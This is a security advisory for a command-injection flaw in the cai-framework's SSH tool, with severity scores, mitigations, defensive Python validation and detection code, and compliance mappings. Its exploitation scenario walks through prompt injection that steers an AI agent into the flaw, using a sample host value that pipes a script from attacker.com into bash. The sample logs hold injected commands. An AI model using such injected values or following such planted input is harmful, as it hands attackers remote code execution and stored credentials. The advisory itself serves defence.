CVE-2025-67511: cai-framework: Command Injection enables RCE

GHSA-4c65-9gqf-4w8h | Severity: CRITICAL | PoC available | CISA SSVC: Attend
Published December 11, 2025
CISO Take

If your security operations team is using the CAI framework (cai-framework pip package <= 0.5.9), stop using it for automated SSH operations immediately — there is no official patch available. The critical risk here is a prompt injection chain: an adversary tricks the AI agent into calling the vulnerable SSH function with injected username/host/port values, achieving arbitrary command execution on the host running your security tooling. Verify your pip environment and pin or remove the package until a patched version ships.

What is the risk?

CVSS 9.6 Critical with network attack vector, zero privileges required, and low complexity makes this highly exploitable against any exposed CAI agent instance. The absence of a patch compounds the risk. Mitigating factor: EPSS 0.00158 indicates low current exploitation in the wild, and exploitation requires user interaction or agent invocation. However, the target is a security automation framework — compromise of a defensive security tool has amplified blast radius, as these systems typically hold credentials and have privileged access to production infrastructure.

What systems are affected?

Package            Ecosystem   Vulnerable range   Patched
cai-framework      pip         <= 0.5.9           No patch
cybersecurity_ai                                  No patch

How severe is it?

CVSS 3.1: 9.6 / 10
EPSS: 1.5% chance of exploitation in 30 days (higher than 71% of all CVEs)
Exploitation status: Exploit available; exploitation likelihood MEDIUM
Sophistication: Moderate
Exploitation confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

Attack Vector (AV):         Network
Attack Complexity (AC):     Low
Privileges Required (PR):   None
User Interaction (UI):      Required
Scope (S):                  Changed
Confidentiality (C):        High
Integrity (I):              High
Availability (A):           High

What should I do?

5 steps:

  1. IMMEDIATE: Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework.

  2. WORKAROUND: Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level.

  3. PATCH: Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release. The fix exists in source but has not been packaged.

  4. DETECTION: Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework.

  5. CONTAINMENT: Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).
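The wrapper-level allowlisting from step 2 and the metacharacter check from step 4, as an added Python example that is not the framework's own code. The function names, the regexes and the JSON log shape are assumptions made for this example; the allowlisted argv is meant to be handed to subprocess.run with shell=False rather than joined into a shell string.

```python
import json
import re

# WORKAROUND-step allowlists: alphanumeric username, IP/FQDN host (IPv6 literals rejected), port 1-65535.
USER_RE = re.compile(r"[A-Za-z0-9]{1,32}")
HOST_RE = re.compile(r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
                     r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")
SHELL_META_RE = re.compile(r"[;|&$`]")  # what the DETECTION step says to look for

def validate_ssh_params(username, host, port):
    """Return (username, host, int_port) or raise ValueError; values are allowlisted, not escaped."""
    if not USER_RE.fullmatch(str(username)):
        raise ValueError("username rejected")
    if len(str(host)) > 253 or not HOST_RE.fullmatch(str(host)):
        raise ValueError("host rejected")
    if not re.fullmatch(r"\d{1,5}", str(port)) or not 1 <= int(port) <= 65535:
        raise ValueError("port rejected")
    return str(username), str(host), int(port)

def build_ssh_argv(username, host, port, command):
    """argv for subprocess.run(argv, shell=False): nothing is concatenated into a shell string."""
    username, host, port = validate_ssh_params(username, host, port)
    return ["ssh", "-p", str(port), f"{username}@{host}", command]

def field_is_safe(field, value):
    """Check one parameter alone by substituting known-good values for the other two."""
    p = {"username": "ops", "host": "127.0.0.1", "port": 22, field: value}
    try:
        validate_ssh_params(p["username"], p["host"], p["port"])
    except ValueError:
        return False
    return not SHELL_META_RE.search(str(value))

def find_injected_params(log_lines):
    """DETECTION step: (line_no, field, value) for each logged SSH parameter that fails."""
    findings = []
    for n, rec in enumerate(map(json.loads, log_lines), 1):
        if rec.get("event") == "ssh_connect":
            for field in ("username", "host", "port"):
                if not field_is_safe(field, rec.get(field, "")):
                    findings.append((n, field, str(rec.get(field, ""))))
    return findings

# Constructed sample lines in a JSON shape assumed for this example (adapt the parser to what the framework really logs); lines 2 and 3 carry injected shell metacharacters.
SAMPLE_LOG = [
    '{"event":"ssh_connect","username":"ops","host":"bastion.corp.example","port":22}',
    '{"event":"ssh_connect","username":"ops","host":"10.0.0.5; id","port":22}',
    '{"event":"ssh_connect","username":"ops","host":"10.0.0.5","port":"22 | id"}',
    '{"event":"tool_call","name":"nmap"}',
]
```

Because the argv list never passes through a shell, a host or port value that slips past validation still cannot start a second command on the agent host.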

What does CISA's SSVC say?

Decision:          Attend
Exploitation:      poc
Automatable:       No
Technical Impact:  total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
  • Art. 15 - Accuracy, robustness and cybersecurity
  • Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
  • 8.4 - AI system operation and monitoring
  • A.9.3 - AI System Security Testing
NIST AI RMF
  • GOVERN-1.7 - Processes for decommissioning and oversight of AI systems
  • GV-6.2 - AI System Security Practices
  • MANAGE-2.4 - Residual risks are managed
  • MS-2.5 - Risks from Third-Party AI Software and Dependencies
OWASP LLM Top 10
  • LLM01 - Prompt Injection
  • LLM06 - Excessive Agency
  • LLM07 - Insecure Plugin Design
  • LLM08 - Excessive Agency

Frequently Asked Questions

Is CVE-2025-67511 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-67511, increasing the risk of exploitation.

What systems are affected by CVE-2025-67511?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, security automation pipelines, AI-driven offensive security tools, CI/CD with AI-assisted testing.

What is the CVSS score for CVE-2025-67511?

CVE-2025-67511 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 1.52%.

What is the AI security impact?

Affected AI Architectures

  • agent frameworks
  • security automation pipelines
  • AI-driven offensive security tools
  • CI/CD with AI-assisted testing

MITRE ATLAS Techniques

AML.T0011.002 Poisoned AI Agent Tool
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051.001 Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0080 AI Agent Context Poisoning

Compliance Controls Affected

EU AI Act: Art. 15, Article 15
ISO 42001: 8.4, A.9.3
NIST AI RMF: GOVERN-1.7, GV-6.2, MANAGE-2.4, MS-2.5
OWASP LLM Top 10: LLM01, LLM06, LLM07, LLM08

What are the technical details?

Original Advisory

Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only the password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection, while the username, host and port values are injectable. This issue does not have a fix at the time of publication.

Exploitation Scenario

An adversary conducting a penetration test or red team engagement using CAI >= 0.5.9 targets a security operations team also running CAI.

  1. Attacker crafts a malicious target hostname, e.g. 'victim.com; curl attacker.com/shell.sh | bash', and delivers it through a channel the victim's CAI agent will process (phishing lure, poisoned scan target list, or indirect prompt injection via agent context).
  2. The CAI agent invokes run_ssh_command_with_credentials() with the attacker-controlled host value.
  3. Because host is not sanitized, the shell executes both the SSH command and the injected payload.
  4. Attacker achieves RCE on the machine running the security team's AI agent, potentially inheriting all stored SSH credentials and access to internal networks the agent was managing.

Weaknesses (CWE)

CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection'): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Implementation] If possible, ensure that all external commands called from the program are statically created.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Timeline

Published:      December 11, 2025
Last Modified:  March 17, 2026
First Seen:     December 11, 2025
